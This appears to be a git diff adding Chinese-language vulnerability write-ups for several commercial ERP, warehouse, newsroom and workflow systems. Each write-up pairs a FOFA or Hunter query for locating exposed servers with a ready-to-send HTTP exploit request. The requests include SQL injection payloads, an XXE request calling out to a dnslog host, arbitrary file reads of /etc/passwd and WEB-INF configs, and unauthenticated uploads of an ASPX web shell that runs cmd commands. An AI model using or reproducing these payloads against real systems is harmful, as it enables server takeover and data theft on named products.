+{"cusNumber":"' UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(67)+CHAR(77)+CHAR(115)+CHAR(70)+CHAR(73)+CHAR(116)+CHAR(80)+CHAR(87)+CHAR(71)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(120)+CHAR(74)+CHAR(82)+CHAR(109)+CHAR(97)+CHAR(84)+CHAR(66)+CHAR(100)+CHAR(78)+CHAR(119)+CHAR(110)+CHAR(66)+CHAR(103)+CHAR(74)+CHAR(69)+CHAR(84)+CHAR(107)+CHAR(109)+CHAR(119)+CHAR(121)+CHAR(113)+CHAR(120)+CHAR(70)+CHAR(101)+CHAR(102)+CHAR(101)+CHAR(122)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)-- cRcq"}
+```
+
+![1721917285475-ecb66d9f-28c3-4ac1-a9cf-edf4fc760ab8.png](./img/YeZr3L9ppZ9Vc3mW/1721917285475-ecb66d9f-28c3-4ac1-a9cf-edf4fc760ab8-788954.png)
+
+
+
+> 更新: 2024-08-12 17:29:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bh8s1goi997wx46g>
\ No newline at end of file
diff --git a/方天云ERP系统GetSalQuatation存在SQL注入漏洞.md b/方天云ERP系统GetSalQuatation存在SQL注入漏洞.md
new file mode 100644
index 0000000..8c97eb5
--- /dev/null
+++ b/方天云ERP系统GetSalQuatation存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 方天云ERP系统GetSalQuatation存在SQL注入漏洞
+
+# 一、漏洞简介
+方天软件以云ERP+MES产品为核心，整合设备层的工业数据，提供软硬件智能+整合方案服务，赋能数字工厂新智造。在模具制造、五金机械、塑胶成型、电子组装等行业成效显著，包括财富500强的企业也正在通过方天软件的综合管理方案而持续获益。方天云ERP系统GetSalQuatation存在SQL注入漏洞
+
+# 二、影响版本
++ 方天云ERP
+
+# 三、资产测绘
++ fofa`body="AjaxMethods.asmx/GetCompanyItem"`
++ 特征
+
+![1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c.png](./img/yhcb6CmmIQ6EhV3S/1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c-958500.png)
+
+# 四、漏洞复现
+```http
+POST /AjaxMethods.asmx/GetSalQuatation HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Connection: close
+ 
+{ID:"(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8725=8725) THEN @@VERSION ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113))"}
+```
+
+![1722875878230-07abf756-4be9-48ca-bc05-da4b330c98b3.png](./img/yhcb6CmmIQ6EhV3S/1722875878230-07abf756-4be9-48ca-bc05-da4b330c98b3-789078.png)
+
+
+
+> 更新: 2024-08-12 17:29:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgp6fcox304sdet3>
\ No newline at end of file
diff --git a/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md b/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md
new file mode 100644
index 0000000..a3b57be
--- /dev/null
+++ b/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md
@@ -0,0 +1,31 @@
+# 方天云智慧平台系统setImg.ashx存在文件上传漏洞
+
+方天云智慧平台系统 setImg.ashx 接口处存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```java
+body="AjaxMethods.asmx/GetCompanyItem"
+```
+
+## poc
+
+```java
+POST /Data/setImg.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
+Connection: close
+ 
+------21909179191068471382830692394
+Content-Disposition: form-data; name="Filedata"; filename="asd.aspx"
+Content-Type: image/jpeg
+ 
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------21909179191068471382830692394--
+```
+
+文件路径`http://ip/UploadFile/CustomerFile/回显路径`
\ No newline at end of file
diff --git a/方正全媒体采编系统存在syn.do信息泄露漏洞.md b/方正全媒体采编系统存在syn.do信息泄露漏洞.md
new file mode 100644
index 0000000..d2dec54
--- /dev/null
+++ b/方正全媒体采编系统存在syn.do信息泄露漏洞.md
@@ -0,0 +1,22 @@
+# 方正全媒体采编系统存在syn.do信息泄露漏洞
+
+方正全媒体采编系统存在syn.do信息泄露漏洞，攻击者可以查看到平台中所有用户的用户名。
+
+## fofa
+
+```yaml
+app="FOUNDER-全媒体采编系统"
+```
+
+## poc
+
+```java
+GET /newsedit/assess/syn.do?type=org HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Content-Length: 185Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20240816100116204](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408161001270.png)
\ No newline at end of file
diff --git a/方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md b/方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md
new file mode 100644
index 0000000..71ae373
--- /dev/null
+++ b/方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md
@@ -0,0 +1,26 @@
+## 方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞
+
+方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞，未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件，获取敏感信息，使系统处于极不安全的状态。
+
+## fofa
+
+```javascript
+app="FOUNDER-全媒体采编系统"
+```
+
+## poc
+
+```javascript
+POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://11111111111.m9cp0s.dnslog.cn%22%3E%20%25remote;%5D%3E
+```
+
+![image-20241012131400968](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121314025.png)
diff --git a/方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md b/方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md
new file mode 100644
index 0000000..a4d2a57
--- /dev/null
+++ b/方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md
@@ -0,0 +1,26 @@
+# 方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞
+
+方正畅享全媒体新闻采编系统 imageProxy.do 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+
+```javascript
+app="FOUNDER-全媒体采编系统"
+```
+
+## poc
+
+```javascript
+POST /newsedit/outerfotobase/imageProxy.do HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+oriImgUrl=file:///etc/passwd
+```
+
+![image-20250103100410296](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031004386.png)
\ No newline at end of file
diff --git a/方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md b/方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..4c4a8bd
--- /dev/null
+++ b/方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+## 方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞
+
+方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞，未经身份验证的恶意攻击者利用SQL注入漏洞获取数据库中信息。
+
+## fofa
+
+```
+app="FOUNDER-全媒体采编系统"
+```
+
+## poc
+
+```javascript
+POST /newsedit/report/reportCenter.do HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+type=paperLayoutList&paperDate=2023-1-1&token=1&pageNo=1&pageSize=1&order=x' THEN 5 ELSE 5 END) AS status from (select '1x' as SYS_CURRENTSTATUS) d) tmp where cast(@@version as int)=5-- a
+```
+
diff --git a/方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md b/方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..f6e2edd
--- /dev/null
+++ b/方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+## 方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞
+
+方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞，未经身份验证的恶意攻击者利用SQL注入漏洞获取数据库中信息。
+
+## fofa
+
+```javascript
+app="FOUNDER-全媒体采编系统"
+```
+
+## poc
+
+```javascript
+POST /newsedit/newsplan/screen.do HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+method=getPaperLayoutList&pageNo=1&pageSize=5&paperDate=2022-11-30&paperIds=123+AND+2675+in+(select+@@version)&terminalType=123
+```
+
diff --git a/时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md b/时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md
new file mode 100644
index 0000000..26cfe25
--- /dev/null
+++ b/时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md
@@ -0,0 +1,29 @@
+# 时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞
+
+时空WMS-仓储精细化管理系统 ImageAdd.ashx 接口存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+body="SKControlKLForJson.ashx"
+```
+
+## poc
+
+```javascript
+POST /ImageUpload/ImageAdd.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="file"; filename="rce.aspx"
+Content-Type: text/plain
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![image-20241206215719619](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062157774.png)
\ No newline at end of file
diff --git a/时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md b/时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md
new file mode 100644
index 0000000..928b834
--- /dev/null
+++ b/时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞
+
+# 同一、漏洞简介
+时空WMS-仓储精细化 管理系统Q是一款高效、智能的仓储管理工具，旨在帮助企业实现仓库的精细化管理和高效运营。由郑州时空软件开发，专注于以数字化、智能化推动企业进步。该系统基于先进的仓储管理理念和技术架构，融合了物联网、移动互联等前沿技术，实现了对仓库内物资的全面、精准、高效管理。系统适用于各类仓储物流企业，包括电商仓储、第三方物流、生产仓储等多个领域。通过使用该系统，企业可以实现对仓库内物资的全面掌控和高效管理，提高库存周转率，降低库存成本，提升企业竞争优势。时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞 
+
+# 二、影响版本
+```plain
+时空WMS-仓储精细化管理系统
+```
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ fofa`body="SKControlkLForJson.ashx"`
++ 特征
+
+![1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370.png](./img/lbQy6c61cqR48Uxn/1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370-168361.png)
+
+# 四、漏洞复现
+```plain
+POST /ImageUpload/ImageAdd.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="file"; filename="rce.aspx"
+Content-Type: text/plain
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![1733071883096-b7edb49c-40ac-40ee-abca-d3f58575a2ef.png](./img/lbQy6c61cqR48Uxn/1733071883096-b7edb49c-40ac-40ee-abca-d3f58575a2ef-148543.png)
+
+```plain
+/upload/20241202/rce.aspx?cmd=whoami
+```
+
+![1733071908903-3da1d155-fb3d-4485-a9e6-a666ec6165b6.png](./img/lbQy6c61cqR48Uxn/1733071908903-3da1d155-fb3d-4485-a9e6-a666ec6165b6-485211.png)
+
+
+
+> 更新: 2024-12-20 14:53:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uuwme5gg6bcn6cym>
\ No newline at end of file
diff --git a/时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md b/时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md
new file mode 100644
index 0000000..01b6809
--- /dev/null
+++ b/时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md
@@ -0,0 +1,29 @@
+# 时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞
+
+时空WMS-仓储精细化管理系统 SaveCrash.ashx 接口存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+body="SKControlKLForJson.ashx"
+```
+
+## poc
+
+```javascript
+POST /crash/SaveCrash.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="file"; filename="rce.aspx"
+Content-Type: text/plain
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![image-20241206215936354](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062159415.png)
\ No newline at end of file
diff --git a/时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md b/时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md
new file mode 100644
index 0000000..6661e0f
--- /dev/null
+++ b/时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞
+
+# 一、漏洞简介
+时空WMS-仓储精细化 管理系统Q是一款高效、智能的仓储管理工具，旨在帮助企业实现仓库的精细化管理和高效运营。由郑州时空软件开发，专注于以数字化、智能化推动企业进步。该系统基于先进的仓储管理理念和技术架构，融合了物联网、移动互联等前沿技术，实现了对仓库内物资的全面、精准、高效管理。系统适用于各类仓储物流企业，包括电商仓储、第三方物流、生产仓储等多个领域。通过使用该系统，企业可以实现对仓库内物资的全面掌控和高效管理，提高库存周转率，降低库存成本，提升企业竞争优势。时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞 
+
+# 二、影响版本
+```plain
+锁群管理系统 V2.0
+```
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ fofa`body="SKControlkLForJson.ashx"`
++ 特征
+
+![1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370.png](./img/B_3LoGT3IdMx4D3i/1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370-919917.png)
+
+# 四、漏洞复现
+```plain
+POST /crash/SaveCrash.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="file"; filename="rce.aspx"
+Content-Type: text/plain
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![1733071772492-82bae175-e317-4642-8d14-4522302fd265.png](./img/B_3LoGT3IdMx4D3i/1733071772492-82bae175-e317-4642-8d14-4522302fd265-876997.png)
+
+```plain
+/crash/log/2024_12/133775453729140443.aspx?cmd=whoami
+```
+
+![1733071799074-e84bebd2-4d75-4825-a9e0-c963b7bf8319.png](./img/B_3LoGT3IdMx4D3i/1733071799074-e84bebd2-4d75-4825-a9e0-c963b7bf8319-510233.png)
+
+
+
+> 更新: 2024-12-20 14:53:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zbiltpbxr1s31uex>
\ No newline at end of file
diff --git a/时空智友企业流程化管控系统formserverSQL注入漏洞.md b/时空智友企业流程化管控系统formserverSQL注入漏洞.md
new file mode 100644
index 0000000..50a6226
--- /dev/null
+++ b/时空智友企业流程化管控系统formserverSQL注入漏洞.md
@@ -0,0 +1,37 @@
+# 时空智友企业流程化管控系统formserverSQL注入漏洞
+
+# 一、漏洞简介
+时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在SQL注入漏洞，攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时，攻击者可以利用这个漏洞来执行恶意的SQL语句，从而绕过应用程序的访问控制和执行非法操作。
+
+# 二、影响版本
++ 时空智友企业流程化管控系统
+
+# 三、资产测绘
++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"`
++ 登录页面
+
+![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/BCjbZh9dZ-Y2DPX1/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-910348.png)
+
+# 四、漏洞复现
+```plain
+POST /formservice?service=workflow.sqlResult HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=123D902C244908C8DA7E61657166AA09; __qypid=""
+Upgrade-Insecure-Requests: 1
+Content-Type: application/json
+Content-Length: 50
+
+{"params": {"a": "11"}, "sql": "select db_name()"}
+```
+
+![1693804111348-8e2c5b0f-d232-4a2a-8247-6c750648a466.png](./img/BCjbZh9dZ-Y2DPX1/1693804111348-8e2c5b0f-d232-4a2a-8247-6c750648a466-301099.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fg34lg8tq11uy1kp>
\ No newline at end of file
diff --git a/时空智友企业流程化管控系统formserver任意文件上传漏洞.md b/时空智友企业流程化管控系统formserver任意文件上传漏洞.md
new file mode 100644
index 0000000..b04ef7f
--- /dev/null
+++ b/时空智友企业流程化管控系统formserver任意文件上传漏洞.md
@@ -0,0 +1,53 @@
+# 时空智友企业流程化管控系统formserver任意文件上传漏洞
+
+# 一、漏洞简介
+时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在任意文件上传漏洞，攻击者可通过系统或应用程序的漏洞将恶意文件上传到目标服务器上，导致目标服务器被攻击者控制。
+
+# 二、影响版本
++ 时空智友企业流程化管控系统
+
+# 三、资产测绘
++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"`
++ 登录页面
+
+![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/KodiOhi15Unj7TlJ/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-152070.png)
+
+# 四、漏洞复现
+```plain
+POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=BDC88B10942C62F82DA953E7503830B2; __qypid=""
+Upgrade-Insecure-Requests: 1
+Content-Length: 229
+
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<html>
+<head>
+    <title>JSP 输出 test 字符</title>
+</head>
+<body>
+    <%-- 使用 out 对象输出 test 字符 --%>
+    <%= "test" %>
+</body>
+</html>
+```
+
+![1693803668053-3bfeca2b-5e8d-4121-b209-644837708b2f.png](./img/KodiOhi15Unj7TlJ/1693803668053-3bfeca2b-5e8d-4121-b209-644837708b2f-555411.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/form/temp/202309043gwzr2x62hiiydrw_a.jsp
+```
+
+![1693803717058-b5c7886e-61db-4860-bf7b-3a07ddcdc5c4.png](./img/KodiOhi15Unj7TlJ/1693803717058-b5c7886e-61db-4860-bf7b-3a07ddcdc5c4-718010.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wupuwnqwagzlmk58>
\ No newline at end of file
diff --git a/时空智友企业流程化管控系统login文件读取漏洞.md b/时空智友企业流程化管控系统login文件读取漏洞.md
new file mode 100644
index 0000000..b99e740
--- /dev/null
+++ b/时空智友企业流程化管控系统login文件读取漏洞.md
@@ -0,0 +1,51 @@
+# 时空智友企业流程化管控系统 login 文件读取漏洞
+
+# 一、漏洞简介
+时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统login 文件读取漏洞，攻击者可利用该漏洞获取系统的敏感信息等。
+
+# 二、影响版本
++ 时空智友企业流程化管控系统
+
+# 三、资产测绘
++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"`
++ 登录页面
+
+![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/vMGuM8abSzeyEALd/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-515017.png)
+
+# 四、漏洞复现
+```plain
+POST /login HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Length: 100
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+op=verify%7Clogin&targetpage=&errorpage=/WEB-INF/dwr.xml&mark=&tzo=480&username=admin&password=admin
+```
+
+![1700038270810-cb915d8f-d0a9-438a-bc87-e7e74156706a.png](./img/vMGuM8abSzeyEALd/1700038270810-cb915d8f-d0a9-438a-bc87-e7e74156706a-083560.png)
+
+```plain
+POST /login HTTP/1.1
+Host: XX.XX.XX.XX
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzi
+Content-Length: 111
+
+op=verify%7Clogin&targetpage=&errorpage=WEB-INF/classes/proxool.xml&mark=&tzo=480&username=admin&password=admin
+```
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ln06lr49a314ww79>
\ No newline at end of file
